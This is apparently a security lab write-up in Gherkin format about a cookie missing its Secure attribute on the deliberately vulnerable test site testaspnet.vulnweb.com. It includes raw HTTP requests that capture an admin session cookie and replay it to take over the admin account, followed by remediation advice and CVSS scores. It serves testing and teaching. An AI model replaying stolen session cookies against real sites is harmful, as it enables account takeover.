## Version 1.4.1
## language: en

Feature:
  TOE:
    Acublog
  Category:
    Improper Session Management
  Location:
    http://testaspnet.vulnweb.com/PostNews.aspx - page (header)
  CWE:
    CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
      https://cwe.mitre.org/data/definitions/614.html
  Rule:
    REQ.029 Cookies with security attributes
      https://fluidattacks.com/web/rules/029/
  Goal:
    Detect and exploit unsafe session management
  Recommendation:
    Set the secure attribute for sensitive cookies

  Background:
    |  <Software name>  |    <Version>    |
    | Microsoft Windows | 10.0.17763.437  |
    | Firefox           | 69.0   (64 bit) |
    | Burpsuite         | 2.1.02 (64 bit) |
  TOE information:
    Given I am accessing the site http://testaspnet.vulnweb.com
    And Entered a .NET site which uses SQL requests
    And IIS version 8.5
    And ASP.NET 2.0.5

  Scenario: Normal use case
    Given I access http://testaspnet.vulnweb.com
    When I login as admin
    Then it's displayed the admin session
    And I click on 'post news' tab

  Scenario: Static detection
    When static detection requires access to source code, asp.net in this case
    And I only have access to the HTML code through elemnt inspect
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given I login as admin
    When I inspect the html source code with firefox tool
    Then I find in headers a cookie that refers to a "sessionId"
    """
    POST /PostNews.aspx HTTP/1.1
    Host: testaspnet.vulnweb.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0)
    Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 2029
    Connection: close
    Referer: http://testaspnet.vulnweb.com/PostNews.aspx
    Cookie: ASP.NET_SessionId=2rbhoerp01wuze552wfry145;
    frmLogin=F250FDFDEDCDF9C15229BDE52500E08DD51B6BEF4690791191CA5518E05BB69B
    AABD9CAA87201E8CEA3D3862BEC7B95F2B0C34952AA6040554BC0298E6AE9FA5DC2B2FE4F
    876496EDA6F797488FC1181D465800E4A12E174DE1578EFD0C8FA894E2A04B530F55AA33D
    12CD16239192BE9B20CC12
    """
    And I read about cookie sessions and how get relevant information
    Then I logout to verify if the cookie change every login
    When I login again to check the cookie value
    Then I find that the cookie is not changed
    And I recognize is possible to get the user session

  Scenario: Exploitation
    Given I access http://testaspnet.vulnweb.com/Defaul.aspx as admin
    When I capture the page request with burpsuit
    Then I find the cookie
    """
    Cookie: ASP.NET_SessionId=2rbhoerp01wuze552wfry145;
    frmLogin=F250FDFDEDCDF9C15229BDE52500E08DD51B6BEF4690791191CA5518E05BB69B
    AABD9CAA87201E8CEA3D3862BEC7B95F2B0C34952AA6040554BC0298E6AE9FA5DC2B2FE4F
    876496EDA6F797488FC1181D465800E4A12E174DE1578EFD0C8FA894E2A04B530F55AA33D
    12CD16239192BE9B20CC12
    """
    And I open a new private window
    Then I access http://testaspnet.vulnweb.com/Defaul.aspx
    And I use burpsuite to capture the page request
    """
    GET /Default.aspx HTTP/1.1
    Host: testaspnet.vulnweb.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0)
    Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1

    """
    Then I add the cookie to the request and send it
    """
    GET /Default.aspx HTTP/1.1
    Host: testaspnet.vulnweb.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0)
    Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: ASP.NET_SessionId=2rbhoerp01wuze552wfry145;
    frmLogin=F250FDFDEDCDF9C15229BDE52500E08DD51B6BEF4690791191CA5518E05BB69B
    AABD9CAA87201E8CEA3D3862BEC7B95F2B0C34952AA6040554BC0298E6AE9FA5DC2B2FE4F
    876496EDA6F797488FC1181D465800E4A12E174DE1578EFD0C8FA894E2A04B530F55AA33D
    12CD16239192BE9B20CC12
    Upgrade-Insecure-Requests: 1
    """
    Then I'm logged as admin
    And I can delete news
    Then I can conclude that is possible steal session cookies

  Scenario: Remediation
    When the cookie is created use HTTPOnly atribute
    And set de secure flag on all cookies
    And limit cookie lifespan
    Then the program can prevent theft of session cookies

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8/10 (High) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    7.6/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.6/10 (High) - CR:M/IR:H/AR:M/MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-09
